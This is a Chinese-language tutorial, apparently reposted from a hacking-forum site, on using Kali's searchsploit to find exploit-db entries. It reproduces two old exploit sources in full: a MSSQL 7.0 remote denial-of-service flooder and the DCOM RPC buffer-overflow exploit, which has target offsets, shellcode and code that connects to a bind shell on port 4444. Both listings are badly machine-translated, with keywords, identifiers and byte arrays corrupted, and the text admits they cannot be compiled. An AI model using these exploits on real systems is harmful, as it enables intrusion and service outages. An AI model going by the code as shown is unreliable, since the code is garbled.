這篇文章來自www.cnhackteam.org。
Searchsploit 會在本地的 exploit-db 副本中搜索軟件漏洞信息,無需聯網。
打開 Kali 的命令行並輸入:
searchsploit
不帶參數執行時會顯示幫助信息。
查找 mssql 的漏洞
如果要查找 mssql 的漏洞,命令如下。它會列出所有與 mssql 相關的漏洞條目,每一條由漏洞描述和對應的文件路徑組成:
searchsploit mssql
要查看某條漏洞的詳細內容,例如 MSSQL 7.0 的遠程 DoS 漏洞,用編輯器打開漏洞描述後面列出的路徑即可:
leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c
該文本文件的內容包括漏洞說明與對應的利用代碼(下面的引用在轉載過程中已被機器翻譯損壞,僅供參考,不能直接編譯):
/* Microsoft mssql 7.0 server容易受到拒絕服務攻擊
*通過發送包含指定數據的大型緩沖區,攻擊者可以阻止
服務
* "mssqlserver "註意到的錯誤因服務而異
包裝,但結果總是
*同壹個。
*異常代碼= c0000005
*易受攻擊:MSSQL7.0 sp0 - sp1 - sp2 - sp3
*本守則出於教育目的,我不對您的行為負責
*問候:sm0g DEADm|x #crack.fr itmaroc和evryone我忘記了*/# include & lt;stdio.h & gt
# include & ltwinsock.h & gt
#pragma註釋(lib," ws2_32 ")
u _ long resolv(char *);
void main(int argc,char **argv) {
WSADATA WinsockData
插座s;int I;vulh中的結構sockaddr _ inchar緩沖區[700000];for(I = 0;我& lt700000;i+=16)memcpy(buffer+i," \ x 10 \ x00 \ x00 \ x 10 \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc \ xcc ",16);如果(argc!=3) {
printf(" MSSQL拒絕服務\ n ");
printf("作者securma massine \ n ");
我沒有參加任何考試
妳應該對自己的行為負責。
printf(" syntax:MSSQL dos & lt;ip & gt& lt端口& gt\ n ");
退出(1);
}
WSAStartup(0x101,& ampWinsockData);
s=socket(AF_INET,SOCK_STREAM,IP proto _ TCP);
zero memory(& amp;vulh,sizeof(vulh));
vulh.sin _ family = AF _ INET
vulh . sin _ addr . s _ addr = resolv(argv[1]);
vulh . sin _ port = htons(atoi(argv[2]);if (connect(s,(struct sockaddr *)& amp;vulh,sizeof(vulh))==SOCKET_ERROR) {
printf("不可能的連接器...港口壹般是1433...\ n ");
退出(1);
}
{
send(s,buffer,sizeof(buffer),0);
printf("數據環境...\ n ");
}
printf(" \ nattendez querques seconds和verifiez que le serveur ne
報告加。\ n ");
closesocket
WSACleanup();
}
u _ long resolv(char *主機名){ struct in _ addr addrstruct hostent * host _ entif((addr . s _ addr = inet _ addr(host _ name))= =-1){ if(!(host _ ent = gethostbyname(host _ name))){
printf ("Erreur DNS:不可能得到地址%s
!!!\n ",主機名);
退出(1);
}
copy memory((char *)& amp;addr.s_addr,host _ ent-& gt;h_addr,host _ ent-& gt;h _ length);
} return addr.s _ addr
}//milw0rm.com[2004-09-29]查看代碼
查找與 Windows XP 相關的漏洞:
searchsploit /xp
用編輯器打開對應的漏洞文件:
leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c
/*
?LSD - Exploit基於Xfocus的代碼發現DCOM RPC溢出
作者H D .摩爾& ltmetasploit.com的hdm
-用法:。/DCOM & lt;目標ID & gt& lt目標IP & gt
?-目標:
?- ?0 Windows 2000 SP0(英語)
?- ?1 Windows 2000 SP1(英語)
?- ?2 Windows 2000 SP2(英語)
?- ?3 Windows 2000 SP3(英語)
?- ?4 Windows 2000 SP4(英語)
?- ?5 Windows XP SP0(英語)
?- ?6 Windows XP SP1(英語)
*/# include & lt;stdio.h & gt# include & ltstdlib.h & gt# include & lterror.h & gt# include & ltsys/types . h & gt;# include & ltsys/socket . h & gt;# include & ltnetinet/in . h & gt;# include & ltarpa/inet . h & gt;# include & ltunistd.h & gt# include & ltnetdb.h & gt# include & ltfcntl.h & gt# include & ltunistd.h & gt無符號字符bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,0x16,0xD0,0x16,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x01無符號字符請求1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x06,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,無符號char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x5C,0x00,0x5C,0x 00 };無符號字符請求3[]={ 0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00無符號字符*目標[] =
{“Windows 2000 SP0(英文)”、“Windows 2000 SP1(英文)”、“Windows 2000 SP2(英文)”、“Windows 2000 SP3(英文)”、“Windows 2000 SP4(英文)”、“Windows XP SP0(英文)”、“Windows XP SP1(英文)”、NULL };無符號長偏移量[] =
{ 0x77e81674,0x77e829ec,0x77e824b5,0x77e8367a,0x77f92a9b,0x77e9afe3,0x77e626ba,
};unsigned char sc[]= " \ x46 \ x00 \ x58 \ x00 \ x42 \ x00 \ x46 \ x00 \ x58 \ x00 " " \ x46 \ x00 \ x44 \ x00 \ x42 \ x00 \ x46 \ x00 \ x58 \ x46 \ x00 \ x58 \ x00 " " \ x46 \ x00 \ x58 \ x00 \ x46 \ x00 \ x00 \ x00 \ x00 " " \ xff \ xff無符號字符請求4[]={ 0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x 88,08,02,/*翻錄自TESO碼*/void shell(int sock){ int l;char buf[512];
fd_set?rfdswhile (1) {
FD _ SET(0 & amp;rfds);
FD _ SET(sock & amp;rfds);
選擇(sock + 1,& amprfds,NULL,NULL,NULL);if (FD_ISSET (0,& amprfds)) {
l = read (0,buf,sizeof(buf));if(l & lt;= 0) { printf("\n -連接被本地用戶關閉\ n ");退出(EXIT _ FAILURE);
}
write (sock,buf,l);
} if (FD_ISSET (sock,& amprfds)) {
l = read (sock,buf,sizeof(buf));if (l == 0) { printf ("\n -連接被遠程主機關閉。\ n ");退出(EXIT _ FAILURE);
} else if(l & lt;0) { printf ("\n -讀取失敗\ n ");退出(EXIT _ FAILURE);
}
write (1,buf,l);
}
}
} int main(int argc,char * * argv){ int sock;int len,len 1;無符號整數target _ id無符號長整型retstruct sockaddr _ in target _ ip無符號短端口= 135;無符號char buf 1[0x 1000];無符號char buf 2[0x 1000];printf("-\ n ");printf("-遠程DCOM RPC緩沖區溢出漏洞利用\ n ");printf("-FlashSky和Benjurry的原始代碼\ n ");printf("-由HDM改寫& lthdm[at]metasploit . com & gt;\ n ");if(argc & lt;3)
{ printf("-用法:% s & lt目標ID & gt& lt目標IP & gt\n ",argv[0]);printf("-Targets:\ n ");for(len = 0;目標[len]!= NULLlen++)
{ printf("-?%d\t%s\n ",len,targets[len]);?
} printf(" \ n ");退出(1);
} /*耶,想得開:)*/target _ id = atoi(argv[1]);
ret = offsets[目標標識];printf("-使用返回地址0x%.8x\n ",ret);memcpy(sc+36,(無符號字符*)& amp;ret,4);
target _ ip.sin _ family = AF _ INET
target _ IP . sin _ addr . s _ addr = inet _ addr(argv[2]);
target _ IP . sin _ port = htons(port);if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("-Socket ");return(0);
} if(connect(sock,(struct sockaddr *)?_ip,sizeof(target_ip))!= 0)
{
perror("-Connect ");return(0);
}
len = sizeof(sc);memcpy(buf2,request1,sizeof(request 1));
len 1 = sizeof(request 1);
*(無符號長整型*)(request2)=*(無符號長整型*)(request 2)+sizeof(sc)/2;?
*(無符號長整型*)(request2+8)=*(無符號長整型*)(request 2+8)+sizeof(sc)/2;memcpy(buf2+len1,request2,sizeof(request 2));
len 1 = len 1+sizeof(request 2);memcpy(buf2+len1,sc,sizeof(sc));
len 1 = len 1+sizeof(sc);memcpy(buf2+len1,request3,sizeof(request 3));
len 1 = len 1+sizeof(request 3);memcpy(buf2+len1,request4,sizeof(request 4));
len 1 = len 1+sizeof(request 4);
*(無符號長整型*)(buf2+8)=*(無符號長整型*)(buf 2+8)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0x10)=*(無符號長整型*)(buf 2+0x 10)+sizeof(sc)-0xc;?
*(無符號長整型*)(buf2+0x80)=*(無符號長整型*)(buf 2+0x 80)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0x84)=*(無符號長整型*)(buf 2+0x 84)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0xb4)=*(無符號長整型*)(buf 2+0x B4)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0xb8)=*(無符號長整型*)(buf 2+0x b8)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0xd0)=*(無符號長整型*)(buf 2+0xd 0)+sizeof(sc)-0xc;
*(無符號長整型*)(buf2+0x18c)=*(無符號長整型*)(buf 2+0x 18c)+sizeof(sc)-0xc;if (send(sock,bindstr,sizeof(bindstr),0)== -1)
{
perror("-Send ");return(0);
}
len=recv(sock,buf1,1000,0);if (send(sock,buf2,len1,0)== -1)
{
perror("-Send ");return(0);
}
關閉(襪子);
睡眠(1);
target _ ip.sin _ family = AF _ INET
target _ IP . sin _ addr . s _ addr = inet _ addr(argv[2]);
target _ IP . sin _ port = htons(4444);if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("-Socket ");return(0);
} if(connect(sock,(struct sockaddr *)?_ip,sizeof(target_ip))!= 0)
{ printf("- Exploit似乎已經失敗。\ n ");return(0);
} printf("-放入系統外殼...\ n \ n ");
貝殼(襪子);return(0);
}//milw0rm.com[2003-07-26]查看代碼
查找與蘋果(Apple)相關的漏洞:
searchsploit apple